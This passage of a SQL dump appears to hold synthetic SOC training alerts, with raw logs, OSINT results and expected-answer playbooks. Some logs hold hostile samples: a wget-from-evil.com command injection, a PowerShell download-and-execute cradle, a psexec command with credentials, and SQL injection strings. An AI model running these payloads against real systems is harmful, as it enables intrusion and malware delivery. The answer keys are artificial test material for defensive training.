to harvest credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:58Z\",\"event_type\":\"email_received\",\"email_sender\":\"noreply@secure-update.com\",\"username\":\"asmith\",\"hostname\":\"CORP-LAPTOP03\",\"url\":\"http://secure-update.com/login\",\"domain\":\"secure-update.com\"}', '2026-01-11 09:03:00', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Sender domain spoofed to resemble a legitimate service\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site designed to harvest credentials\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain reported for phishing activities\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email\'s spoofed domain and the malicious URL were clearly intended for phishing, confirming the threat.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (621, 'Malware Detected: Known Malicious File Executed', 'critical', 'CrowdStrike', 'A malicious file with a known bad hash was executed on a host system. The file is flagged by multiple antivirus engines indicating its high threat level.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"domain\":\"maliciousdomain.com\"}', '2026-01-09 22:10:29', '2026-01-11 14:07:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malicious by over 50 antivirus engines.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain is associated with known malware distribution.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file hash confirms this is a true positive malware event.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (622, 'Critical Malware Detected: Trojan Executed on Host', 'critical', 'CrowdStrike', 'A known Trojan malware was executed on the host machine. The file hash matches a known malicious hash with 50+ detections on VirusTotal.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"john.doe\",\"hostname\":\"DESKTOP-ABC123\",\"command_line\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\"}', '2026-01-11 14:07:44', '2026-01-11 14:07:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60 out of 70 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution of known Trojan\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected file and external IP are confirmed malicious based on multiple OSINT sources, indicating a true positive malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (623, 'Critical Malware Detected on Medical Device', 'critical', 'CrowdStrike', 'A known malware signature was detected on a hospital\'s medical device, potentially compromising patient data. Immediate action is required to isolate the device to prevent data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"\",\"username\":\"nurse.jones\",\"hostname\":\"med-device-01\",\"command_line\":\"C:\\\\malware\\\\ransomware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"\",\"url\":\"\",\"email_sender\":\"\"}', '2026-01-11 14:47:48', '2026-01-11 14:47:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60+ AV engines as ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised device\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Malicious executable triggered on the device\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malware, indicating a true positive. Immediate isolation of the device is necessary to prevent further compromise.\"}', 'Novice', 'EDR', 1, 1, 'HEALTHCARE'), (624, 'Brute Force Attack on EHR System', 'high', 'Wazuh', 'Multiple failed login attempts detected on the Electronic Health Record (EHR) system from a suspicious IP address, suggesting a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.2.10\",\"username\":\"admin\",\"hostname\":\"ehr-server-01\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":25}', '2026-01-11 14:47:48', '2026-01-11 14:47:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of EHR server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Admin account targeted in brute force attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP is known for malicious activity, confirming a true positive brute force attempt. The admin account should have its credentials reset to prevent unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE'); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (625, 'Brute Force Attack Detected from Malicious IP', 'high', 'CrowdStrike', 'A series of failed login attempts were detected from an external IP address known for malicious activities.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION1\",\"failed_attempts\":35}', '2026-01-10 01:20:02', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account within the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address has a known history of brute force attacks, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'), (626, 'Malware Detected via EDR Signature', 'critical', 'Carbon Black', 'A malware file with a known signature was detected on a corporate workstation.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.11\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"CORP-WORKSTATION2\",\"command_line\":\"C:\\\\malware\\\\evil.exe\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnopqrst\"}', '2026-01-10 11:52:11', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 65 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\evil.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file execution path\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (627, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected containing a URL that redirects to a malicious site.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"104.244.42.1\",\"email_sender\":\"phisher@maliciousdomain.com\",\"hostname\":\"mail.corp.com\",\"url\":\"http://maliciousdomain.com/login\"}', '2026-01-09 22:15:29', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL redirects to known phishing site\"}}],\"expected_actions\":[\"block_url\",\"educate_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that redirects to a malicious site, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'), (628, 'SQL Injection Attack Detected on Web Server', 'critical', 'Wazuh', 'A SQL injection attempt was detected targeting the corporate web server.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.2\",\"dst_ip\":\"10.0.0.5\",\"hostname\":\"WEB-SERVER1\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 00:24:58', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a clear SQL injection payload, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'), (629, 'Suspicious Network Connection Detected', 'medium', 'Firewall', 'A network connection was made to an external IP known for suspicious activities.', 'Network Connection', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"185.143.223.42\",\"hostname\":\"CORP-WORKSTATION3\"}', '2026-01-11 09:40:55', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 100 times for suspicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"monitor_traffic\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for suspicious activities, warranting further investigation.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'), (630, 'Failed Login Attempts Detected on Internal System', 'low', 'Splunk', 'Multiple failed login attempts were detected from an internal IP address. The source does not show any malicious history.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"mwhite\",\"hostname\":\"CORP-SERVER1\",\"failed_attempts\":8}', '2026-01-10 12:00:04', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mwhite\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known internal user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed attempts were from an internal IP with no known malicious history.\"}', 'Novice', 'SIEM', 1, 1, 'TECH'), (631, 'Email with Potentially Malicious Attachment', 'medium', 'Proofpoint', 'An email was detected with an attachment that could potentially be malicious. The attachment is not flagged by any antivirus engines.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:20:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.5\",\"email_sender\":\"unknown@unknown.com\",\"hostname\":\"mail.corp.com\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-01-09 16:19:52', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"unknown@unknown.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email from an unknown sender\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not detected as malicious by any antivirus engines\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The attachment is not flagged by any antivirus engines; hence it\'s considered a false positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (632, 'Unauthorized PSExec Execution Detected', 'high', 'Wazuh', 'An unauthorized execution of PSExec was detected on an internal server, indicating possible lateral movement.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER2\",\"command_line\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\"}', '2026-01-10 16:40:16', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized use of PSExec tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized execution of PSExec indicates possible lateral movement, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'TECH'), (633, 'False Positive: Suspicious Domain Access', 'low', 'SIEM', 'Access to a domain flagged as suspicious, but further analysis shows no malicious activity.', 'Web Request', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T17:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"hostname\":\"CORP-WORKSTATION4\",\"domain\":\"safedomain.com\"}', '2026-01-11 09:50:46', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"safedomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain is clean and not associated with any known threats\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain access was incorrectly flagged as suspicious; no malicious activity was found.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'), (634, 'Command Injection Attempt Detected', 'critical', 'IDS', 'A command injection attempt was detected targeting a web application.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T18:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.10\",\"hostname\":\"WEB-APP1\",\"request_body\":\"id; wget http://evil.com/malware.sh\"}', '2026-01-11 00:35:15', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple command injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id; wget http://evil.com/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a command injection payload, confirming this as a true positive.\"}', 'Novice', 'MAL', 1, 1, 'TECH'), (635, 'Outbound Connection to Known Malicious IP', 'high', 'Firewall', 'An outbound connection was detected to an IP address with known malicious activities.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T19:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.21\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"CORP-WORKSTATION5\"}', '2026-01-11 11:18:33', '2026-01-11 14:51:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"monitor_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for data exfiltration, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'), (636, 'Malware Detected via IPS Signature', 'critical', 'IDS/IPS', 'A known malware signature was detected in network traffic.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T20:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.22\",\"dst_ip\":\"192.168.1.5\",\"hostname\":\"CORP-WORKSTATION6\",\"file_hash\":\"efgh5678abcd1234ijkl9012mnopqrst\"}', '2026-01-11 00:34:12', '2026-01-11 14:51:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"efgh5678abcd1234ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 70 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'), (637, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious process was executed on host WIN-1234ABCD using PowerShell. The command appears to be attempting to download a file from a suspicious external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jdoe\",\"hostname\":\"WIN-1234ABCD\",\"command_line\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 00:07:42', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download and execute a malicious script\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution clearly shows intent to download and execute a malicious script from a known bad IP.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'), (638, 'Brute Force Attack Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from an external IP on the corporate VPN service, suggesting a brute force attack.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unknown\",\"hostname\":\"VPN-SERVER\",\"failed_attempts\":25}', '2026-01-11 08:27:41', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 450 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from the same external IP indicates a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'), (639, 'Phishing Email Detected', 'high', 'Proofpoint', 'A phishing email was received by user jsmith containing a suspicious link purportedly leading to a document download.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.15\",\"username\":\"jsmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"no-reply@notarealcompany.com\",\"url\":\"http://malicious-link.com/download\"}', '2026-01-11 11:57:34', '2026-01-11 14:52:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@notarealcompany.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain not recognized as legitimate business.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known to host phishing content\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in phishing campaigns\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known malicious URL used in phishing attacks.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS'), (640, 'SQL Injection Attempt Detected', 'critical', 'Web Application Firewall', 'An SQL injection attempt was detected targeting the login page of the corporate web application.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:20:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.1.20\",\"username\":\"n/a\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 09:57:55', '2026-01-11 14:52:56', 